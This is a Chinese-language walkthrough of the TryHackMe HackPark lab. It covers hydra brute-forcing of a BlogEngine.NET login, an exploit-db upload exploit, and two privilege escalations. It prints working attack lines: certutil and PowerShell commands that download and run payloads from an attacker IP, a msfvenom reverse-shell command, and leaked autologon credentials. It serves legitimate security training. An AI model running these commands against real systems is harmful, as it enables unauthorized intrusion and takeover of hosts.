Tryhackme - hackpark (考点:hydra & BlogEngine.NET 3.3.6 & autologon登录信息提权 & abnormal service提权)

1 扫描

主要就是80进web搜集信息

C:\root> nmap -A 10.10.16.216
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 01:55 EDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.64 seconds
C:\root> nmap -A 10.10.16.216 -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 01:55 EDT
Nmap scan report for 10.10.16.216
Host is up (0.27s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE    VERSION
80/tcp   open  tcpwrapped
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 6 disallowed entries 
| /Account/*.* /search /search.aspx /error404.aspx |_/archive /archive.aspx |_http-server-header: Microsoft-IIS/8.5 |_http-title: hackpark | hackpark amusements 3389/tcp open tcpwrapped |_ssl-date: 2020-05-26T05:56:29+00:00; +1s from scanner time. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port OS fingerprint not ideal because: Missing a closed TCP port so results incomplete No OS matches for host Network Distance: 2 hops 

2 hydra

没找到什么价值东西
dirbuster扫到登录框
Tryhackme - hackpark (考点:hydra & BlogEngine.NET 3.3.6 & autologon登录信息提权 & abnormal service提权)插图
没有账号信息提示文件,sql注入也难搞。hydra跑跑看看,然后边等结果,边继续搜集其他信息。

keep me logged in那里打勾,然后随便输
burp抓包,再根据burp的抓包数据从而写这个hydra命令。账号就先猜admin
建议参考我的这个命令。
我先前试了很多次都跑不出来,跑出来16个莫名其妙的,我在论坛里看也有很多人是这种情况。
最后这个才ok

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.16.216 http-post-form "/Account/login.aspx?ReturnURL=%2fadmin%2f:__VIEWSTATE=d%2B8KY5CoALVVu3cyx1zQBa5HJIO%2B%2BuZdB%2F%2BI60ddHdGPMLjeczLW8wG6%2F3cxgyyj17FxjLlJy7Twjwl9N1TRQeynyuc%2F5RKomk5MP%2FpeLy5wQ2c%2B7weG4x4uHWQiN%2FQF4LIxVWckJ9JJ917ffDnhcNkWhEBiW8q3eZ19lK2WyzCRq7S2DZkFFNMnsXpVs7at1VNHuoutNFwFg%2BVI37N6HIkOx5Qt328mR7vR7ebWV06at%2FS%2BsdWUqSKUoYuhr9OqGbzaUlh%2FnjLqzUm7SFRA1L5C8PIZwaoyXGbiL7eASUHrj8s6vV%2FeiHbGYe5qsDWUSyQ%2BC2n0ElFVOIz403nfU7lhvpxR3XtPJgq5UHAn%2ByWx57H7&__EVENTVALIDATION=1XEVJ1TGaBbiR0C2cHb0tUPm%2F1h0aH5m0aXu8WckU4cPKPYBmRLiAqA2YXBqXGokg%2FhfrQi0VwT0Hq88Tkye8%2B5IB%2FtOYN5QvJ%2Fcr5XMLS4etWgbMuTiY%2FFYogM1B6Rn9WbdAh%2FRXUPQEDcxHvLHDKyyIS09lavR7XBTiUvPVfzqMMDv&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24RememberMe=on&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"

Tryhackme - hackpark (考点:hydra & BlogEngine.NET 3.3.6 & autologon登录信息提权 & abnormal service提权)插图(1)
进入后,看到版本
Tryhackme - hackpark (考点:hydra & BlogEngine.NET 3.3.6 & autologon登录信息提权 & abnormal service提权)插图(2)

3 BlogEngine.NET 3.3.6

网上搜相关漏洞https://www.exploit-db.com/exploits/46353

下载后,把文件名改为PostView.ascx
这里修改成自己的ip
Tryhackme - hackpark (考点:hydra & BlogEngine.NET 3.3.6 & autologon登录信息提权 & abnormal service提权)插图(3)
然后网站后台里在content里post上传,点击new。可能网站运行速度很慢而报错,等一等。

右边的那个文件夹图案file manager那里继续上传,upload传入我们下载并改好的的漏洞脚本。
Tryhackme - hackpark (考点:hydra & BlogEngine.NET 3.3.6 & autologon登录信息提权 & abnormal service提权)插图(4)
Tryhackme - hackpark (考点:hydra & BlogEngine.NET 3.3.6 & autologon登录信息提权 & abnormal service提权)插图(5)
提示成功后,返回上一级界面 点击右边的publish,就提示上传好了。

上传成功后,再点击10.10.16.216/?theme=../../App_Data/files。打开监听,拿到shell

4 windows autologon 登录信息提权

这个shell左边没有显示,看着奇怪,不过将就用了。懒得再转发弹新shell
上winpeas.exe 自动扫
看到有自动登录密码信息,还是admin的。。直接提权。参考这个靶机bart
Tryhackme - hackpark (考点:hydra & BlogEngine.NET 3.3.6 & autologon登录信息提权 & abnormal service提权)插图(6)
套路是一样的,我的nishang shell文件都不用变,还是那个2.ps1。底下修改下ip和端口就行了。
nishang的用法之前讲过很多了,这里就不再说了。
最终命令稍微改改,一个是密码要改,二是主机名要改成现在这个hackpark
Tryhackme - hackpark (考点:hydra & BlogEngine.NET 3.3.6 & autologon登录信息提权 & abnormal service提权)插图(7)

powershell.exe -c "$user='WORKGROUP\administrator'; $pass='4q6XvFES7Fdxs'; try { Invoke-Command -ScriptBlock { iex(New-Object Net.WebClient).DownloadString('http://10.9.23.70/2.ps1') } -ComputerName hackpark -Credential (New-Object System.Management.Automation.PSCredential $user,(ConvertTo-SecureString $pass -AsPlainText -Force)) } catch { echo $_.Exception.Message }" 2>&1"

收到拿下。
Tryhackme - hackpark (考点:hydra & BlogEngine.NET 3.3.6 & autologon登录信息提权 & abnormal service提权)插图(8)

5 abnormal service提权

另外一种方法是根据官网的题目提示
看到系统运行着不常见的可疑文件服务,通过这种方式提权。
我的1小时过了,所以重启靶机,ip地址也换了。

还是看刚才winpeas的扫描结果
两处都提示这个目录很可疑,且有写的权限
Tryhackme - hackpark (考点:hydra & BlogEngine.NET 3.3.6 & autologon登录信息提权 & abnormal service提权)插图(9)

Tryhackme - hackpark (考点:hydra & BlogEngine.NET 3.3.6 & autologon登录信息提权 & abnormal service提权)插图(10)

winpeas除了有exe,还有bat版。再用bat版结合扫一下,和exe扫的结果,一个是颜色区别,另外好像内容侧重也不一样。。。

cd /windows/temp
c:\windows\system32\inetsrv>cd /windows/temp
certutil -urlcache -split -f http://10.9.23.70/winPEAS.bat 666.bat
c:\Windows\Temp>certutil -urlcache -split -f http://10.9.23.70/winPEAS.bat 666.bat
****  Online  ****
  0000  ...
  8061
CertUtil: -URLCache command completed successfully.
c:\Windows\Temp\666.bat
c:\Windows\Temp>c:\Windows\Temp\666.bat
            *((,.,/((((((((((((((((((((/,  */               
     ,/*,..*(((((((((((((((((((((((((((((((((, ,*/((((((((((((((((((/,  .*//((//**, .*((((((* 
   ((((((((((((((((* *****,,,/########## .(* ,((((((   
   (((((((((((/* ******************/####### .(. ((((((
   ((((((..******************/@@@@@/***/######* /((((((
   ,,..**********************@@@@@@@@@@(***,#### ../(((((
   , ,**********************#@@@@@#@@@@*********##((/ /((((
   ..(((##########*********/#@@@@@@@@@/*************,,..(((( .(((################(/******/@@@@@#****************.. /((
   .((########################(/************************..*( .((#############################(/********************.,( .((##################################(/***************..( .((######################################(************..( .((######(,.***.,(###################(..***(/*********..( .((######*(#####((##################((######/(********..( .((##################(/**********(################(**...( .(((####################/*******(###################.(((( .(((((############################################/ /(( ..(((((#########################################(..(((((. ....(((((#####################################( .((((((. ......(((((#################################( .(((((((. (((((((((. ,(############################(../(((((((((. (((((((((/, ,####################(/..((((((((((. (((((((((/,. ,*//////*,. ./(((((((((((.
                (((((((((((((((((((((((((((/"
                       by carlospolop
ECHO is off.
Advisory: winpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
ECHO is off.
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [*] BASIC SYSTEM INFO <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] WINDOWS OS <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Check for vulnerabilities for the OS version with the applied patches

看到运行的服务里
有wscheduler.exe好像和那个可疑目录名字上有点关联,以及还有其他exe比如message这些比较可疑的,平常难见的,可以稍微留心,说不定都有用
Tryhackme - hackpark (考点:hydra & BlogEngine.NET 3.3.6 & autologon登录信息提权 & abnormal service提权)插图(11)

进入那个可疑目录看看,看到有message.exe。对应了上面扫出来的可疑服务进程
Tryhackme - hackpark (考点:hydra & BlogEngine.NET 3.3.6 & autologon登录信息提权 & abnormal service提权)插图(12)
再深入挖掘,event里看log,发现admin在不断打开和关闭运行着message.exe,可能就是不断发信和关闭,再发信吧。
Tryhackme - hackpark (考点:hydra & BlogEngine.NET 3.3.6 & autologon登录信息提权 & abnormal service提权)插图(13)
这样也明白了。是admin再运行这个message.exe,而这个目录我们又有写的权限。

伪造一个新的message.exe,但其实是弹shell文件。这样admin执行它时,实际上在弹shell给我们,如此就提权了。

msfvenom -p windows/shell_reverse_tcp LHOST=10.9.23.70 LPORT=443 -e x86/shikata_ga_nai -f exe -o Message.exe

把靶机目录下老的message.exe改为其他文件,免得重复会出问题。

ren Message.exe Message.bak

再传进来新的message

certutil -urlcache -split -f http://10.9.23.70/Message.exe Message.exe

过一会,监听就收到了,拿下
Tryhackme - hackpark (考点:hydra & BlogEngine.NET 3.3.6 & autologon登录信息提权 & abnormal service提权)插图(14)

没有账号? 忘记密码?

社交账号快速登录